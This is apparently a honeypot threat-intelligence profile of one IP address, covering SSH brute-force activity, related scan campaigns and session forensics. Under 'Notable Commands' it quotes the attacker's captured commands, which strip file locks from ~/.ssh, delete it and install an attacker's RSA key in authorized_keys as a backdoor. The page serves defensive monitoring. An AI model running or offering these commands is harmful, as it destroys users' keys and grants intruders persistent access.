← Back to feed

81.9.145.130

TAGGED SUSPICIOUS how we decide →
Threat Confidence
64%
Location
🇪🇸 ES / Barakaldo
ASN
AS12338 · Euskaltel S.A.
Cloud Provider
Total Events
46
Average by volume
Agent Count
2
First / Last Seen
2026-05-16 22:53 — 2026-05-19 17:50
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-19 20:02
blocklist_de:reported
Campaigns
Multi-Agent Scan SCAN Active medium
84 IPs 159673 events
2026-03-13 — ongoing · 84 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
84 IPs 160130 events
2026-03-13 — ongoing · 84 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
73 IPs 56169 events
2026-03-06 — ongoing · 73 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
82 IPs 164587 events
2026-03-01 — ongoing · 82 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
112 IPs 221857 events
2026-03-01 — ongoing · 112 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
45 IPs 8308 events
2026-03-01 — ongoing · 45 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on Linode. Scanning the same …
Multi-Agent Scan SCAN Active medium
68 IPs 24505 events
2026-03-01 — ongoing · 68 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
49 IPs 27144 events
2026-03-01 — ongoing · 49 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
HASSH 03a80b21afa8… — SSH-2.0-libssh_0.11.1 (111 IPs, 25 countries) HASSH Active high 🇨🇳 CN
111 IPs 35719 events
ssh:bruteforce
2026-02-27 — ongoing · 111 IPs are running an identical SSH client (HASSH fingerprint 03a80b21afa8…). Top network: Chinanet (AS4134). Geographic and ASN …
Session Forensics
malware_dropper ×2 credential_probe ×2 opportunistic_bruter ×2
Sessions
6 (4 with login)
Avg Depth Score
0.57
Commands Executed
6
Files Downloaded
2
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter e680b7edcafd newark_01 · 2026-05-19 17:50
1 50%
Loading events...
Malware Dropper a791504471d5 newark_01 · 2026-05-19 17:50
3 1 1 100%
Loading events...
Credential Probe 781c29797141 newark_01 · 2026-05-19 17:50
1 20%
Loading events...
Opportunistic Bruter dcbeb02ce607 w4m_singapore_01 · 2026-05-16 22:53
1 50%
Loading events...
Malware Dropper ff676c527cda w4m_singapore_01 · 2026-05-16 22:53
3 1 1 100%
Loading events...
Credential Probe 3a280bfa0c64 w4m_singapore_01 · 2026-05-16 22:53
1 20%
Loading events...